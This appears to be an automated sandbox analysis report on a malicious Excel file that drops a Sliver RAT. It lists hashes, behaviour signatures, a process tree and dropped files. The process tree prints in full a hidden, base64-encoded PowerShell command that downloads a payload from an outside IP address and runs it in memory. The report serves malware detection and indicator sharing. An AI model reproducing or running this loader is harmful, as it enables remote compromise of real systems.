Analysis

  • max time kernel
    59s
  • max time network
    72s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-11-2024 22:07

General

  • Target

    4ae151e76c7d2da0d855f92abf58bd44c00a18eaadb7550f46507aae9c07caad.xls

  • Size

    46KB

  • MD5

    5f292d4cf9f505eca69bf6ce3905319a

  • SHA1

    5b77b73b29c78a54066a4d059ddb1ddd416d7b93

  • SHA256

    4ae151e76c7d2da0d855f92abf58bd44c00a18eaadb7550f46507aae9c07caad

  • SHA512

    ac71e214369caf1cb43cf0fabfe4268321985f69024a622721f5e359908c9d0ede008f1d0d9d9053689a2d94dd0bd504b9678ca5afab10591c9c506c08b3caa8

  • SSDEEP

    768:w4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:7SFsv66g3KnF439NKC54kkGfn+cL2Xd+

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Sliver RAT v2 6 IoCs
  • Sliver family
  • SliverRAT

    SliverRAT is an open source Adversary Emulation Framework.

  • Blocklisted process makes network request 26 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\4ae151e76c7d2da0d855f92abf58bd44c00a18eaadb7550f46507aae9c07caad.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2300
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1420
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a2updqwc\a2updqwc.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1872
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBBED.tmp" "c:\Users\Admin\AppData\Local\Temp\a2updqwc\CSC5BA012EDF15A4B3A8A78C1A2A08DA99C.TMP"
          4⤵
            PID:1328

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RESBBED.tmp

      Filesize

      1KB

      MD5

      c34f3905cb7ee147c0766ec8b762218a

      SHA1

      aef8f8f17ea755f367270dbb8f7bc3917f1d556f

      SHA256

      3bc77c60ca11972ca9aca99ebac04e154bbdcc636f0ae685fcf0c4ff5c054b50

      SHA512

      56e81a4ee35ce4a31968279c2bbe7e371d96edfb5d18e2ce1d690a7f7f5e2b7afe804202f576a509ae7cc205ce6a33ef43672bbdda3b96e7a770f2c46303de88

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_00cm4qxr.lyr.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\a2updqwc\a2updqwc.dll

      Filesize

      3KB

      MD5

      c278943139e085a3c5c69f6e41c3515f

      SHA1

      acbe31d260fd7607a360def8ab36a499fad91b3d

      SHA256

      5fb46a4ee50cd3d29cca45b34bd3705cffc9c5f512d03fba0fefefec144bc4c1

      SHA512

      c046edbcd033c96bc1c0b4cc5ad51130954bf6ea9551d30df01fc2128afb3edb3cc6f1266ef5d519df32262d85268948a774da11d13398c718e06f2562cd5c2a

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

      Filesize

      2KB

      MD5

      ed35faf226badca23aceac60cc886558

      SHA1

      4074f84ab658087344b862e3f0380d74675e2f6d

      SHA256

      869d64b20ca84170bbd185609dda314cc50ee639b6103d601a0e6d4a5d7fb17e

      SHA512

      17c0a4aa33bb1182860012e75d44c38a6c39d1a4be51d9866df250a0209d81a142735a9b994d1e63e3b2bb720b8c59b596d93b5b65fbdcb61d7d7791955776dc

    • \??\c:\Users\Admin\AppData\Local\Temp\a2updqwc\CSC5BA012EDF15A4B3A8A78C1A2A08DA99C.TMP

      Filesize

      652B

      MD5

      ba4edf292e7d86e437008cd2ac34cf6b

      SHA1

      85f5800d6f42d8b5d170cdc3f2c27fefd772226d

      SHA256

      12569ff0944b87846f4e72f41caa0bcfd1deb6d412c69ef650f09d0f3f2c0e77

      SHA512

      6354e95900dd622d8a5057de34d80f963246d6ccfa8b560f13769231649ddb0435632b8ffec957ae29546d01f30d58f7b508c5b2d5ad192b720ffa659db58fad

    • \??\c:\Users\Admin\AppData\Local\Temp\a2updqwc\a2updqwc.0.cs

      Filesize

      631B

      MD5

      f4dd5c682eb7b3b679f084261bfc7c4c

      SHA1

      70f75d7a4e42c185eb09139ed3c6f7338a2219c2

      SHA256

      2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

      SHA512

      8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

    • \??\c:\Users\Admin\AppData\Local\Temp\a2updqwc\a2updqwc.cmdline

      Filesize

      369B

      MD5

      a56821207d1dfb3197acef68c7f2fb26

      SHA1

      52f48e25c1047a1d7d85808bd0caeb754a0a69b9

      SHA256

      93c3f81ea45784c413e198db0ff1fd86a4147fb5b1c2ca9a7e63b73465d1e1bf

      SHA512

      b4826d6e169365bd82a5033654173eb1216fff2229d3e841e4d72b4f964064ecaf5ad5a80f75242d958a96960f73b49af85e2ab7360f38f894ef2c62064a9282

    • memory/1420-66-0x000001D6607D0000-0x000001D6612B6000-memory.dmp

      Filesize

      10.9MB

    • memory/1420-57-0x000001D6468B0000-0x000001D6468B8000-memory.dmp

      Filesize

      32KB

    • memory/1420-62-0x000001D65F2D0000-0x000001D65FD4E000-memory.dmp

      Filesize

      10.5MB

    • memory/1420-63-0x000001D6607D0000-0x000001D6612B6000-memory.dmp

      Filesize

      10.9MB

    • memory/1420-64-0x000001D6607D0000-0x000001D6612B6000-memory.dmp

      Filesize

      10.9MB

    • memory/1420-65-0x000001D6607D0000-0x000001D6612B6000-memory.dmp

      Filesize

      10.9MB

    • memory/1420-70-0x000001D6607D0000-0x000001D6612B6000-memory.dmp

      Filesize

      10.9MB

    • memory/1420-44-0x000001D646880000-0x000001D6468A2000-memory.dmp

      Filesize

      136KB

    • memory/2300-7-0x00007FFC94C30000-0x00007FFC94E25000-memory.dmp

      Filesize

      2.0MB

    • memory/2300-11-0x00007FFC94C30000-0x00007FFC94E25000-memory.dmp

      Filesize

      2.0MB

    • memory/2300-17-0x00007FFC94C30000-0x00007FFC94E25000-memory.dmp

      Filesize

      2.0MB

    • memory/2300-19-0x00007FFC94C30000-0x00007FFC94E25000-memory.dmp

      Filesize

      2.0MB

    • memory/2300-18-0x00007FFC94C30000-0x00007FFC94E25000-memory.dmp

      Filesize

      2.0MB

    • memory/2300-28-0x00007FFC94C30000-0x00007FFC94E25000-memory.dmp

      Filesize

      2.0MB

    • memory/2300-29-0x00007FFC94C30000-0x00007FFC94E25000-memory.dmp

      Filesize

      2.0MB

    • memory/2300-13-0x00007FFC94C30000-0x00007FFC94E25000-memory.dmp

      Filesize

      2.0MB

    • memory/2300-15-0x00007FFC52B50000-0x00007FFC52B60000-memory.dmp

      Filesize

      64KB

    • memory/2300-14-0x00007FFC94C30000-0x00007FFC94E25000-memory.dmp

      Filesize

      2.0MB

    • memory/2300-12-0x00007FFC94C30000-0x00007FFC94E25000-memory.dmp

      Filesize

      2.0MB

    • memory/2300-16-0x00007FFC52B50000-0x00007FFC52B60000-memory.dmp

      Filesize

      64KB

    • memory/2300-9-0x00007FFC94C30000-0x00007FFC94E25000-memory.dmp

      Filesize

      2.0MB

    • memory/2300-2-0x00007FFC54CB0000-0x00007FFC54CC0000-memory.dmp

      Filesize

      64KB

    • memory/2300-8-0x00007FFC94C30000-0x00007FFC94E25000-memory.dmp

      Filesize

      2.0MB

    • memory/2300-61-0x00007FFC94C30000-0x00007FFC94E25000-memory.dmp

      Filesize

      2.0MB

    • memory/2300-10-0x00007FFC94C30000-0x00007FFC94E25000-memory.dmp

      Filesize

      2.0MB

    • memory/2300-6-0x00007FFC94C30000-0x00007FFC94E25000-memory.dmp

      Filesize

      2.0MB

    • memory/2300-1-0x00007FFC54CB0000-0x00007FFC54CC0000-memory.dmp

      Filesize

      64KB

    • memory/2300-4-0x00007FFC54CB0000-0x00007FFC54CC0000-memory.dmp

      Filesize

      64KB

    • memory/2300-5-0x00007FFC54CB0000-0x00007FFC54CC0000-memory.dmp

      Filesize

      64KB

    • memory/2300-3-0x00007FFC94CCD000-0x00007FFC94CCE000-memory.dmp

      Filesize

      4KB

    • memory/2300-71-0x00007FFC94C30000-0x00007FFC94E25000-memory.dmp

      Filesize

      2.0MB

    • memory/2300-0-0x00007FFC54CB0000-0x00007FFC54CC0000-memory.dmp

      Filesize

      64KB